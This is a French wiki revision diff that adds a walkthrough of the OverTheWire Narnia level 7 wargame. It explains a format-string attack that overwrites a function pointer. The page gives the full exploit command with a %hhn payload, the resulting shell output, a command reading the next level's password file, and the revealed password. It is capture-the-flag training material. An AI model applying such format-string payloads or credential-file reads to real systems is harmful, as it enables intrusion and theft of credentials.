Outils d'utilisateurs
overthewire_narnia:level7
Différences
Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.
|
overthewire_narnia:level7 [2013/03/03 15:28] thelizardking créée |
overthewire_narnia:level7 [2017/04/09 15:33] (Version actuelle) |
||
|---|---|---|---|
| Ligne 58: | Ligne 58: | ||
| return 0; | return 0; | ||
| } | } | ||
| + | </code> | ||
| + | |||
| + | Une simple format string, il faut écrire l'adresse de ''hackedfunction'' dans la variable ''ptrf''. La tâche est grandement facilité étant donné qu'on nous donne l'adresse de la variable. | ||
| + | |||
| + | <code> | ||
| + | |||
| + | $ ./narnia7 $(python -c 'print "l\xd6\xff\xffm\xd6\xff\xffn\xd6\xff\xffo\xd6\xff\xff%145c%6$hhn%229c%7$hhn%126c%8$hhn%4c%9$hhn"') | ||
| + | goodfunction() = 0x804867b | ||
| + | hackedfunction() = 0x80486a1 | ||
| + | |||
| + | before : ptrf() = 0x804867b (0xffffd66c) | ||
| + | I guess you want to come to the hackedfunction... | ||
| + | Way to go!!!!$ id | ||
| + | uid=14007(narnia7) gid=14007(narnia7) euid=14008(narnia8) groups=14008(narnia8),14007(narnia7) | ||
| + | $ cat /etc/narnia_pass/narnia8 | ||
| + | mohthuphog | ||
| </code> | </code> | ||
overthewire_narnia/level7.1362320917.txt.gz · Dernière modification: 2017/04/09 15:33 (modification externe)
Outils de la Page
Sauf mention contraire, le contenu de ce wiki est placé sous la licence suivante : CC Attribution-Share Alike 3.0 Unported
